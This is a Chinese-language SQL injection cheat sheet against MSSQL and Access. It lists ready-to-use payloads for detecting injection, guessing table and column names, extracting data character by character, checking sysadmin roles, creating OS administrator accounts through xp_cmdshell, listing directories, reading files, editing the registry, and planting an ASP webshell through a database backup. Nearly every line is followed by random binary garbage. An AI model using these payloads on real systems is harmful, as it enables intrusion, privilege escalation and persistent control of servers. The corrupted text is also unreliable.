1.判断是否有注入;and 1=1 ;and 1=2 MF��'Z�?�M
2.初步判断是否是mssql ;and user>0 �'�J} ?'{.
t2�7UlF��X
3.注入参数是字符'and [查询条件] and ''=' �Mn���FrQC
TPBQfp%�HU
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �._tEDY/1m
ps2��j�]�g
5.判断数据库系统 9FS�a=<0wE
,yNuz@^�
P
;and (select count(*) from sysobjects)>0 mssql e<� @�$�(w
f4.j��W�BF
;and (select count(*) from msysobjects)>0 access e.�MyJ�:eL
pJ8�F�+`�*
�O�W}��;i|
\j�k*�Nm8;
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Ix_w.f��=8
',`Qx�{tQ)
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 f:�\)!
&W
�~�
i+�XVo
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 :�l]qT�CmY
`+�< ^Svou
9.(1)猜字段的ascii值(access) Brs6RkRf��
Co��n�i�k`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �'6N�rL;�
�
tM�\BO0
(2)猜字段的ascii值(mssql) ��EgPL�+qL
+�$�L}�B-F
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��
�D~"a"�
M}��X ��`�
10.测试权限结构(mssql) �rQT%�~oM:
���^�`lD�w
�&8i$`6�wY
�)=�gU~UV�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- mY�o~RXKGF
2 ^"j]g>mj
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��u0+F2+ I
$}b)E�MMM�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 36co��'a4,
iTd�am�u`L
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- � ]XlBV-@b
\��(�Nx�)F
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 2�dHO!A$RF
HP�*{1Q�@5
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- xP�m{'J+b~
q�Y%��|U�o
;and 1=(select IS_MEMBER('db_owner'));-- Q�hR�z5�7'
�c� ��o�ZK
*%jtcno=�Y
�w3
vZ}1|
11.添加mssql和系统的帐户 %k?/pRv�$>
7�w�W��x�8
;exec master.dbo.sp_addlogin username;-- 0OG�
3#pE�
;exec master.dbo.sp_password null,username,password;-- T��w$t��E:
2K/t[.�8��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- v9@_�DlV\
#w5�%^�HwO
;exec master.dbo.xp_cmdshell 'net user username password *"_��W�1}^
0@{bpc rc�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- qF(i�1�#��
���o@Pv�A1
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��!.#��g��
E|-�5=!]fX
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- MaP��hG�<?
F�> Ika=z,
KY<
�$+/B!
8M��Divr/@
12.(1)遍历目录 y[D�g��yt�
_&gO�>G,uy
;create table dirs(paths varchar(100), id int) uIO�?4\s&G
1+3-Z>�^�e
;insert dirs exec master.dbo.xp_dirtree 'c:\' _?f�elxG[�
yM�kR)HY
;and (select top 1 paths from dirs)>0 gGCr~��.5
|��*Z�M{$�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ^�F�Nju/b�
9i_�@3OVl�
&
\5�Ur�^t
$�!p2Kf>/Q
(2)遍历目录 ���rV��O�F
=C�(BZ+-^
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �\N|��}V.r
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 %sZ�3�Gpi
'Q]W�k7�5
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 .&�b�c3cW�
B�Ui,+NdIk
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 b�eY���G�P
Ssir?ZUm �
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 V$�$9R��h
753gcY�#�i
D��N*M-�o9
{9P(U\]e]k
13.mssql中的存储过程 `T%nGV�l>\
�n�W�f8�r8
xp_regenumvalues 注册表根键, 子键 {<Y!'�WL{
*� >NML]#0
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 X�H!�n{Of
�6���P(j�c
xp_regread 根键,子键,键值名 �MfI+o�<{r
3�S>rc0]6
;exec xp_regread ,5~�C($-�t
��Mz)
r�'�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 3WGO�ftLzt
R��cR�-sbR
xp_regwrite 根键,子键, 值名, 值类型, 值 A�2Pe��I"y
`5x0p��� a
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 $K\;sn; |:
)�P+<=8@a�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 4�/Slt�W�U
O#�8l�J�%?
xp_regdeletevalue 根键,子键,值名 \�\oa[nvL~
IY�}GU 2#�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 >)>�~S��_u
b9�b`%9�/L
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �KeyHxU�=?
�U+��D��#
CRzLyiRvU&
}�LW��rtmc
14.mssql的backup创建webshell fo9V&��NE�
�aiw�4�J��
use model u!��V�r�MH
=(,kjw8�8w
create table cmd(str image); �2of+�KI:�
�_��3�9�VL
insert into cmd(str) values (''); ~(���rZ�)
-�s91�/�|n
backup database model to disk='c:\l.asp'; r�b>2l3g*
8-O��:��e�
d�-���8g��
IMy!8��$\u
15.mssql内置函数 NfCo)C��-t
�`��+�M�va
;and (select @@version)>0 获得Windows的版本号 ��yaI j�Xv
N45@)s!F9j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa [#:y�O�Zt
�pqbKPpG�
;and (select user_name())>0 爆当前系统的连接用户 4]cr1K
^��
rO,n�~�|YJ
;and (select db_name())>0 得到当前连接的数据库 q^���[��SN
$M4C4_o�Py
Qeq=��4Nq�
PB{5C*Y7^k
16.简洁的webshell eTtiAF=b�W
/hGu42Y�G�
use model 0���}Q��d�
V�4g�vKWc�
create table cmd(str image); cy�I:dv�g
�w*4sT+�
P
insert into cmd(str) values (''); ugW.nf�*O
&e4����E�Z
backup database model to disk='g:\wwwtest\l.asp';
